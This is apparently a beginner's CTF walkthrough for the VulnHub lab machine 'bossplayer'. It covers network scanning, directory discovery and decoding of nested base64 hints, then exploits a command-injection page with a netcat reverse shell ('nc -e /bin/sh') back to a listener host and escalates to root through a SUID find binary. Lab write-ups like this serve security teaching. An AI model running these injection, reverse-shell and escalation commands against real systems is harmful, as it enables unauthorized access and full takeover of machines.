top of page

bossplayer ctf walkthrough

In this article we will solve another CTF challenge . This CTF challenge is for beginners. we can download this machine from vulnhub.


walkthrough


First step is to find the IP address of the target by using the command : netdiscover -i wlan0

Now next step is to check for the open ports and for that we used the command : nmap -A 192.168.43.152

we can see that only two ports are open and these are 22(SSH) and 80(HTTP). So we decided to browse HTTP Service by opening a browser and type the URL 192.168.43.152:80

So this is what webpage looks like . Now we decided to find hidden files and directories because there is no hint for us. To find hidden files and directories we use a tool dirb . This is a tool which comes preinstalled in Kali Linux OS. So we run this tool by using the command : dirb http://192.168.43.152

We have found these 3 files . we decided to open http://192.168.43.152/robots.txt

and we found this :

it looks like it is encoded in base64 format so we decided to decode it by using the command : echo bG9sIHRyeSBoYXJkZXIgYnJvCg== | base64 -d

So it is useless for us!!


Now after this we open the source code of the webpage and at the last of the source code we found another string encoded in base64 format.

So by using the same command we decode the text as : echo WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK | base64 -d

so after decoding the first string we get another string encoded in base64 format so we again decode it and again we found a string encode in base64 format ,so we decode it also and one more time we have a string in same format and after decoding it we get a text as workinginprogress.php . So it can be a new page so we open this URL http://192.168.43.152/workinginprogress.php

So after thinking a lot we came up with a solution and that is what if we try to execute some OS command by using http://192.168.43.152/workinginprogress.php?cmd=id; , then yes we were right , after executing this command we got the desired output

it means we can execute nc also to get a shell . Please read the article : https://www.haclabs.org/post/beginners-guide-to-netcat to know more about nc.

so we used this URL : http://192.168.43.152/workinginprogress.php?cmd=nc -e /bin/sh 192.168.43.9 4444 to get a shell and do not forget to start listener on Kali Linux by using the command : nc -nlvp 4444 before executing the above URL.

Now we seek for SUID binaries by using the command : find / -perm -u=s -type f 2>/dev/null

Here we can use find binary to get root shell by using the command :

find . -exec /bin/sh -p \; -quit

So we have root shell and we confirmed it by executing the command id